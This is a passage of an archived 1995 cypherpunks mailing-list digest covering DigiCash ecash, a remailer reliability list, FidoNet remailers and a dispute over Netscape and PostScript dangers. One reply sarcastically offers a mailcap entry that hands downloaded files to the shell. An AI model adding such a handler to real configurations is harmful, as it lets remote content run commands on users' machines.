  Conforms to joint Europay, MasterCard, Visa specifications;
  multiple applications including loyalty and closed systems;
  superior data integrity in case of malicious/accidental
  interference/interruption; requires only the smallest and most
  proven chips, e.g. SC-24 or ST601; mask technology licensing.

CAFE: smart card and card-accepting electronic wallet project
  Consortium of 12 other members founded and chaired by
  Dr. Chaum of DigiCash; simulation, mask and first readers
  developed by DigiCash; trial in November 1995 at the European
  Commission headquarters building; technology trial in
  participation with related open special interest group and
  partially funded by the EC.

DyniCash: highway-speed road-toll collection system using smart cards
  Chip card inserts into battery-powered dashboard unit;
  reflected backscatter microwave technology by industry leader
  Amtech; prepaid mode has user privacy; open and/or closed
  pricing schemes; tested extensively in Japan; non-exclusive
  licensing of the payment technology.

Ecash(TM): software only electronic cash system for internet/email
  Users download software that can make and receive payments;
  protects users' money like travellers checks and privacy like
  coins; world-wide experiment with tens of thousands of users;
  Macintosh, MS-Windows and X-Windows; any WWW browser; user
  software free with issuer licensing.

Facility Card: complete facility management smart-card/reader system
  Cash replacement, access control, and time/attendance system;
  now in schools, hospitals, industry, offices, recreation;
  interfaces to vending, point-of-sale, access control, copiers,
  phones, gaming; downloadable & upgradeable readers work on-line
  and/or off-line; sold through VAR's.

*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *

                    Early Adopter Companies
                    =======================

AdOne Classified Network (Steve Brotman, +1 212 431 5842,
http://www.adone.com/)

BizNet Technologies (Doug Mauer, +1 540 231 7715,
http://www.bnt.com/)

Consensus Development Corporation (Christopher Allen, +1 510
559 1500, http://www.consensus.com/)

Delorie Software (http://www.delorie.com/)

Global-X-Change Communications (Elliot Burdett, +1 613 235 6865,
http://www.globalx.net/)

PULVER.COM (Jeff Pulver, +1 917 336 8240, http://www.pulver.com/)

Sun Microsystems (Humphrey Polanen, +1 415 336 0022,
http://www.sun.com/)

The Electronic Frontier Foundation (EFF) (Stanton McCandlish,
+1 415 668 7171, http://www.eff.org/)

The Electronic Privacy Information Center (EPIC) (Marc
Rotenberg, +1 202 546 6520, http://www.epic.org/)

The New Sun Newspaper (Lese Dunton, +1 212 799 7402,
http://shebute.com/newsun/today/)

The Well (Bruce Katz, +1 415 332 4335, http://www.well.com/)

Walter Shelby Group (John Buckman,
http://www.shelby.com/pub/shelby/)

These companies offering their clients ecash(TM)
------------------------------------------------
Husky Labs (David Levine, +1 410 889 3409,
http://www.butterfly.net/)

  (Clients: National Public Radio, The National Geographic
  Society, PoliticsUSA, Penguin Books, E-Z Communications,
  Pentagon Cds and Tapes, AfroAmerican Newpapers, Ellicott
  Machine Corp., The Greater Baltimore Committee Technology
  Council, National Petroleum Council, Netv, Review.Net, Robert
  Rytter & Associates, and United States Holocaust Memorial
  Museum)

Organic Online (Brian Behlendorf, +1 415 284 6888,
http://www.organic.com/)

  (Clients: Advertising Age, Saturn Cars, Rubin Postaer Agency,
  Sybase, Inc., Volvo Cars of North America, Xircom,
  1-800-Collect, Conari Press Books, Great Amercian Music Hall,
  City of Tribes Communications, Octel, Montgomery Securities,
  Macromedia)

Poppe Tyson Advertising (Fergus O'Daly, +1 212 727 5600,
http://www.poppe.com/)

  (Clients: American Express Travel Agency, PSINet Inc.,
  Intercon Systems Corp., Fordham University, New York Cruise
  Lines Inc., Osram Sylvania, Pfizer, Food Service Group,
  Ridgewood Savings Bank, Warner Lambert, Drew, EUA COGENEX, New
  Jersey Travel and Tourism, AT&T, American Isuzu Motors,
  DataProducts, Magellan, Toshiba America, Computer Systems
  Division, Toshiba Computer Systems, Toshiba Disk Products,
  Applied Medical Informatics, Cascade Design Automation,
  Chrysler Corp. Cirrus Logic, Cypress Semiconductor, Escalade,
  Hewlett-Packard, Hyundai Electronics America, Intel Corp.,
  International Network Services, Internet Profiles Corp.,
  LANNET, Logic Modeling, Measurex, MIPS Tchnologies, Netscape
  Communications Corporation, Network Equipment Technologies,
  Network General, Nokia, North Mountain Software, Premisys
  Radiomail, Red Herring Magazine, Robert Half International,
  Sony Electronics Inc., Broadcast Product Group, Sync Research,
  Synopsys, Synopsys Logic Modeling Group, Touche, Valvoline)

*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *

                   Further Documents Available
                   ===========================

1. "The Ease of Using ecash",
   tutorial, October 1995, 10 pages. (Text with diagrams.)

2. Congressional Testimony:

   text of testimony delivered by Dr. David Chaum to Committee
   Hearing of the U.S. House of Representatives:"The Future of
   Money", Subcommittee on Domestic and International Monetary
   Policy; Committee on Banking and Financial Services, July
   1995, 3 pages. (Text only.)

3. "Achieving Electronic Privacy",
   by Dr. David Chaum, Scientific American, August 1992, 6 pages.
   (Text with diagrams.)

4. European Union - Project CAFE:
   Conditional Access For Europe, brochure, 1994, 2 pages.
   (Text only online, diagrams and text only by post.)


How to obtain documents
-----------------------
Items 1-4 are available on our World Wide Web Server at:

1) http://www.digicash.com/publish/ecash_intro/ecash_intro.html
2) http://www.digicash.com/publish/testimony.html
3) http://www.digicash.com/publish/sciam.html
4) http://www.digicash.com/products/projects/cafe.html

Please let us know, if you would like to receive any of
Items 1-4 in one of the following other formats:

a) via electronic mail in plain text (ascii) format,
(Item 1 and 4 unavailable)
b) via facsimile
c) via post

---------------------------PRESS RELEASE------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 23 Oct 95 07:00:06 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510231359.GAA26702@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              ******+*****     7:15  99.99%
mix      mixmaster@remail.obscura.com     + ---------   1:36:59  99.84%
hacktic  remailer@utopia.hacktic.nl       *   ********    10:05  99.80%
portal   hfinney@shell.portal.com            ******###     1:52  99.78%
alumni   hal@alumni.caltech.edu           +  ++-*+++#*     6:28  99.71%
rmadillo remailer@armadillo.com           + ++++++++++    43:31  99.67%
ecafe    remail@ecafe.org                 -    ****###     3:31  99.67%
spook    remailer@valhalla.phoenix.net    ** *********    16:56  99.60%
wmono    wmono@valhalla.phoenix.net       * **********    13:16  99.58%
penet    anon@anon.penet.fi                 -+-- ----+  5:07:54  99.03%
ideath   remailer@ideath.goldenbear.com   --------.-    4:44:16  96.61%
c2       remail@c2.org                    +  +++++        57:02  96.35%
flame    remailer@flame.alias.net         + ****+  * *    26:48  94.29%
vishnu   mixmaster@vishnu.alias.net        * ****  * *     9:26  93.72%
bsu-cs   nowhere@bsu-cs.bsu.edu           #   ** ***    1:20:32  92.71%
rahul    homer@rahul.net                  *# ** ****##     2:20  99.71%
ford     remailer@bi-node.zerberus.de     . ----._     22:58:20  73.77%
syrinx   syrinx@c2.org                    - ---+--      1:30:08  57.37%
extropia remail@extropia.wimsey.com       - ------      4:48:34  50.13%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Sun, 22 Oct 95 23:02:56 PDT
To: cypherpunks@toad.com
Subject: Re: digicash & unix clients
Message-ID: <199510230602.HAA24973@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> wrote:
>	I haven't seen any listing of the platforms supported by the
>live digicash system. Does anyone know where that information is
>available? Thanks.

It will be the exact same list as ecash trial (but not exactly the same 
software). It will be available by the time real accounts are issued. 
Hopefully tomorrow. Working on it.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Sun, 22 Oct 95 23:11:25 PDT
To: cypherpunks@toad.com
Subject: Re: Re: Chaum's cash: backup?
Message-ID: <199510230611.HAA25001@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com> wrote:
>>if it was like "real" cash, then it really would be lost.
>It is really lost.
>Your disk drive contains information the bank *cannot* know.
>If you do not know that information either, you cannot prove to
>the bank or anyone else that you rightfully possess a legitimate coin.

You seem to have different information than we have. Strange. Please 
reread the press release.

I could give a hint: your random state initializer is not the too-often 
used srand( time( NULL ) ) but user-chosen during installation. Write 
that initializer down and you can re-generate all coins. The bank can 
check wether these coins were indeed signed, and, after revealing 
blinding factors, the bank can also check if they were used. The 
difference must have been on your disk.

This system is not completely operational yet but will be used in the 
future.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Mon, 23 Oct 95 17:31:07 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510222108.OAA05412@jobe.shell.portal.com>
Message-ID: <951023.071054.7N0.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Alice de 'nonymous keeps on going.

Hey, Alice... either post an EXPLOIT using this supposed hole or SHUT
UP!
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
           "I used to be disgusted, but now I'm just amused."
            -- from an old T-shirt(ca. 1975), not an Elvis Costello lyric

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIuHXxvikii9febJAQF3XQQAnhkpoyPSuDxrBgl3LlpC9oeXXs0j6AHi
Vd5CX7cvF6lSd9aMPVfa/3hzDz6aMawEnXURRTfzsnhMb7B+Y0VvC8D+rqXKE5jb
Doma3efaYYr8oi8xism0P8BASwabP2kUnGjBXdrg5PteiRfihh0SBCcj7u3klsI5
hEuOQAI9uO4=
=3xvF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 04:37:55 PDT
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: airport security
In-Reply-To: <Pine.OSF.3.91.951022131818.9371D-100000@Joyce-Perkins.tenet.edu>
Message-ID: <199510231136.HAA03942@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Harmon writes:
> Another aspect of the reqiurement for the name on a ticket is to 
> discourage the development of a secondary, uncontrolled market in tickets.

We all know how horrible that would be.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 08:42:33 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION TO OFFER REWARD FOR REVEALING HOLES IN ECASH
Message-ID: <199510231537.IAA15846@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: Sameer Parekh
	 sameer@c2.org
         510-601-9777 (pager: 510-321-1014)

COMMUNITY CONNEXION TO OFFER REWARD FOR REVEALING HOLES IN ECASH

October 23, 1995 - Community ConneXion, an internet privacy provider
in Berkeley, California, announced the extension of its existing
"Hack" contests to the electronic cash system announced today by
Digicash bv and Mark Twain Bank.

"The ecash deployment an important step towards making internet
commerce more than just a curiosity," said Sameer Parekh, President of
Community ConneXion. The contest is meant, as with the other "Hack"
promotions being run by Community ConneXion, to encourage the
examination of the security of the ecash system so as to reveal holes
before they are exploited by a criminal element.

Community ConneXion hopes that the inquiry being done into the
security of these products results in a secure infrastructure for the
new paradigms provided by internet commerce. "All internet commerce
systems thus far released have been based in old, out-of-date,
insecure technology, such as credit cards. DigiCash is the first
revolutionary system which can change the way we do business," said
Parekh. "If the move to internet commerce does not radically improve
the way people do business, then we have not taken full advantage of
the potential inherent in the technology."

Details regarding the Hack DigiCash promotion are available on
Community ConneXion's webserver at http://www.c2.org/hackecash/.
Contest submissions should be sent to hackecash@c2.org.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and psuedonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org/ or from sending email to
info@c2.org.

Ecash, DigiCash, Cyberbucks, and Mark Twain Bank are trademarks of
their respective owners. This promotion is not affiliated with
DigiCash bv nor Mark Twain Bank.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@obscura.com (Mixmaster)
Date: Mon, 23 Oct 95 09:40:54 PDT
To: cypherpunks@toad.com
Subject: Saudi Arabia?
Message-ID: <199510231640.JAA17600@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know what restrictions there might be on the use
of crypto (pgp) in Saudi Arabia?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 06:44:11 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510222108.OAA05412@jobe.shell.portal.com>
Message-ID: <199510231344.JAA04051@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Anonymous has a good reason to be anonymous -- he's an annoying
fool.

Yes, Mr. Anonymous, we all know postscript is dangerous. Thank you for
this stunning revelation. We've read the IETF documents before, and
some of us even helped write them.

anonymous-remailer@shell.portal.com writes:
> Clearly, someone has a vested interest which they are expending a 
> great deal of effort to protect.  My email to Netscape detailing their 
> logic bomb has gone unanswered, and unacknowledged for ten days now.

Maybe because you're an idiot and they don't feel that its necessary
to answer. What more need be said?

Those of us who care run our postscript interpreters with all the
dangerous commands stripped out, but given that Netscape doesn't
supply postscript interpreters, its not really their fault or
problem.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Mon, 23 Oct 95 07:46:13 PDT
To: cypherpunks@toad.com
Subject: Re: textbooks
Message-ID: <v02130501acb11584d1f9@[199.1.11.226]>
MIME-Version: 1.0
Content-Type: text/plain


>I have also heard good things about a book by Warwick Ford.

"Computer Communications Security", Warwick Ford,
PTR Prentice Hall, 0-13-799453-2

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 23 Oct 95 07:16:40 PDT
To: perry@piermont.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510231344.JAA04051@jekyll.piermont.com>
Message-ID: <9510231413.AA26514@all.net>
MIME-Version: 1.0
Content-Type: text


> Mr. Anonymous has a good reason to be anonymous -- he's an annoying

Perhaps.

> fool.

I don't agree.

> Yes, Mr. Anonymous, we all know postscript is dangerous. Thank you for
> this stunning revelation. We've read the IETF documents before, and
> some of us even helped write them.

Then you should support his point which is valid.

> anonymous-remailer@shell.portal.com writes:
> > Clearly, someone has a vested interest which they are expending a 
> > great deal of effort to protect.  My email to Netscape detailing their 
> > logic bomb has gone unanswered, and unacknowledged for ten days now.
> 
> Maybe because you're an idiot and they don't feel that its necessary
> to answer. What more need be said?

Being insulting and calling people names benefits nobody.

> Those of us who care run our postscript interpreters with all the
> dangerous commands stripped out, but given that Netscape doesn't
> supply postscript interpreters, its not really their fault or
> problem.

I strongly disagree.  If Netscape provided a way to execute shell
commands on your host from a remote computer, it would certainly be a
hole created by their product.  The fact that the default shell is
potentially dangerous means it's incumbant on those who provide access
to it to provide adequate protection.

If Netscape wants to claim their product doesn't degrade security, they
should provide a safe postscript interpreter or not provide hooks to
unsafe ones.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Mon, 23 Oct 95 08:33:26 PDT
To: pkoning@chipcom.com
Subject: Re: "power one time pad"
In-Reply-To: <3087F1A2@mailer2>
Message-ID: <doug-9509231532.AA014714381@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



At the risk of beating a mutilated horse carcass:

>
>Among other things, it says that POTP "doesn't use an encryption algorithm;
>instead it synchronizes random processes on two computers as they
>communicate".  (I wonder if the author understands that that's just another
>way to describe encryption algorithms...)  The other claim is that it 
>eliminates
>the need to manage keys.  "... there is no need for central servers where 
>PGP
>keys ... are kept".
>
Well, PGP does have keys. You have your private key and your public key, and
they have to be managed somehow (stored on disk) even if it's not centrally.
Other algorithms like kerberos have more complex key management issues. 
This has no key, and hence no management.

>This seems like a strange claim because of course PGP doesn't require
>central servers, but more importantly, you can't do authentication without
>at least one piece of keying data being established out of band.  That
>could be a certification authority public key, but you need something
>to get started.
>
This is the most confusing part of the whole thing.. How does it get started.
unfortunately, as this is embroiled in non-disclosure and patent-pending,
we're not going to know, but are forced to take the word of experts such
as David Kahn that it works as advertised.

>Supposedly this thing was shown at Interop.  Did anyone see it, and does
>the product make sense even if the article didn't?
>
Yes, I and a friend of mine were the only two people in the audience
that were not Journalists.  It does look rather intruguing, but so much
negativism is flying about, that most people have dismissed it out of hand.

>(One thing that disturbes me about the product name is the use of the
>phrase "one time pad".  Since the "random" processes are presumably
>not random but rather pseudo-random, there is no one time pad involved
>at all, but rather a plain old stream cypher of some sort, which may or
>may not be secure in practice but cannot have the "secure from first
>principles" property that real one time pad has.)
>
Yeah, this is a bit of a marketing issue. It doesn't use a cryptographically
strong random number generation scheme. Instead, some kind of state about
the two machines and the message stream is used to perform synchronization.
Then, the message itself is supposed to impart the non-repetitive nature
for the non-repeating "One time pad".
 So, in the sense that it never repeats, it could be called a one time pad,
and that's how they are using it. However, according to the traditional
definitions of a one time pad with a strong random number and no correlation,
it may not pass.

I believe they also use a random number stream somehow.. e.g. both parties
observe some random number stream, as well as the randomness in the message
itself to construct the pad. It would seem that if you wanted to decode
message N of an M message sequence, you would need all of the messages 1
through N to do it. If any one of them was missing, you couldn't decode
N itself.
--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
	Apple T-shirt on Win95 - "Been there, done that"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 23 Oct 95 08:01:02 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510231413.AA26514@all.net>
Message-ID: <LAA19345.199510231500@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510231413.AA26514@all.net>, Dr. Frederick B. Cohen writes:
[...]
>I strongly disagree.  If Netscape provided a way to execute shell
>commands on your host from a remote computer, it would certainly be a
>hole created by their product.  The fact that the default shell is
>potentially dangerous means it's incumbant on those who provide access
>to it to provide adequate protection.

They do, add:

application/x-shell; sh %s

to your .mailcap.

They had better stop supporting mailcap alltogether, after all *any*
of the programs in there could have buffer overflows, or other
security problems.  I'll bet some of them even do, anyone want to
see if sox (a program that transforms sound files from format to
format - frequently used to convert .wav files to .au files) has
any overruns in the chunk handling code?

>If Netscape wants to claim their product doesn't degrade security, they
>should provide a safe postscript interpreter or not provide hooks to
>unsafe ones.

Sure, and they had better find a way to keep us from editing the binary
and adding whatever insecure features we may want to their program.

obcrypto: mabie it would be a good idea for programs to list problems that
are beoynd their control.  To many people it may be supprising that anything
in their .mailcap could hurt them.  To others it is hardly a shock and seeing
alot of messages about it tends to get rather boreing, esp. as a few people
jump up and down and yell about the Danger To Us All...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 08:14:41 PDT
To: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Subject: Re: airport security
In-Reply-To: <yDDeDD1w165w@left.webcasters.com>
Message-ID: <199510231514.LAA04145@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This really isn't a cypherpunks topic any longer...

Jim Grubs (W8GRT) writes:
> Alan Horowitz <alanh@infi.net> writes:
> 
> > measures, etc, etc. The other side *has already won* the terror war, 
> > merely by virtue of having set the agenda, and making us spin in tighter 
> > and tighter circles - reacting, not initiating.
> 
> What, then?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 08:32:06 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510231413.AA26514@all.net>
Message-ID: <199510231531.LAA04194@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dr. Frederick B. Cohen writes:
> > Mr. Anonymous has a good reason to be anonymous -- he's an annoying
> 
> Perhaps.
> 
> > fool.
> 
> I don't agree.

Could that be because his style and yours are rather similar? I
haven't had an opportunity to compare word statistics yet...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 08:42:13 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510230720.AAA15634@jobe.shell.portal.com>
Message-ID: <199510231541.LAA04222@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Ha!  I reported a serious problem to Netscape ten days ago, on Thursday
> the twelfth.  They haven't even returned an answer to my email yet nor
> even acknowledged its receipt. 

Your "problem", that is, that postscript can be dangerous, isn't a
netscape bug, deserves no bounty, and you should feel glad that they
are merely ignoring you.

Now go away.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 08:43:43 PDT
To: Frosty <sotmesc@datasync.com>
Subject: Re: CSP
In-Reply-To: <199510230156.UAA09239@osh1.datasync.com>
Message-ID: <199510231543.LAA04230@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This isn't cypherpunks material. Please go away.

Frosty writes:
> AT&T ACCUSED OF DEFRAUDING !!!
> 
>      New York - AT&T Corp. is accused in a lawsuit of cheating millions of
> residential long-distance customers out of billions of dollars by rounding
> off calls to the next full minute.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Mon, 23 Oct 95 09:34:47 PDT
To: cypherpunks@toad.com
Subject: Re: FidoNet Remailer
Message-ID: <THmFDD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

RobL <robl@on-ramp.ior.com> writes:

> At 04:34 PM 10/20/95 -0400, Jim Cannell wrote:
> >
> >=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> >
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >I have been a long time lurker on this list, as well as having a long time
> >interest in crypto.  Most of my activity in this area has been on FidoNet
> >rather than the internet.  Due to the control phreak nature of much of
> >FidoNet, I've spent a lot of time and effort in an attempt to just simply
> >route around the bastards.  I created the SecureMail system, which is a
> >network of FidoNet nodes that agree to route any and all traffic without
> >monitoring or censorship.  Within SecureMail, encrypted traffic is not
> >only permitted, it is encouraged.
> 
> 
> At the end of the month, I will be putting my BBS back online with new
> software which is more Fido friendly than what I had been using.. I would be

The Fido remailer appears to be drawing some interest. Fidonet is often
criticized (by me among many, many others) for being dull, provincial, and
dominated by power phreaks.

However, the Fidonet connectivity protocols have much to be admired from the
'punks perspective. Internet has great speed and bandwidth, but network
routing is "hardwired." Fidonet is frequently slow and narrowband, but
routing is much more flexible. The so-called "nodelist" contains the node
number (the equivalent of IP number), various technical parameters, and the
dial-up telephone number and availibility schedule at which e-mail/data calls
can be accepted.

Since the access number of every site in the network is known, you can send
e-mail directly to the destination site if you wish not to use standard,
fixed routing. This, plus call forwarding and laptops at pre-arranged
temporary locations, means Freeh's wiretap problem is now the need to monitor
every call at every ESS.  Hence, his curious request for huge wiretap
capacity.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMIvDZt74r4kaz3mVAQG74wP/XhD/g9jE/sNcP5dQWskd95yJSPgJgXac
Z42Aj1QfR1fchG4v1A2iuUsaKDma3MU/whn4gqMxJPVjeat6D7wvzU0DzSj7eeSk
mAjVZNnZcmGcXiTy4ueTBcdttgi0JV2g0djijOvKCGx48fMIUy8zWK9vPFe7kpkb
hDzcqlpD5Xw=
=ObiT
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Oct 95 09:18:42 PDT
To: cypherpunks@toad.com
Subject: Re: Mondex vs. Digicash (was: Godzilla vs. Mothra)
Message-ID: <v02120d01acb170bb505e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

To: rah@shipwright.com (Robert Hettinga), www-buyinfo@allegra.att.com,
        ecm@ai.mit.edu, bsdc@ai.mit.edu
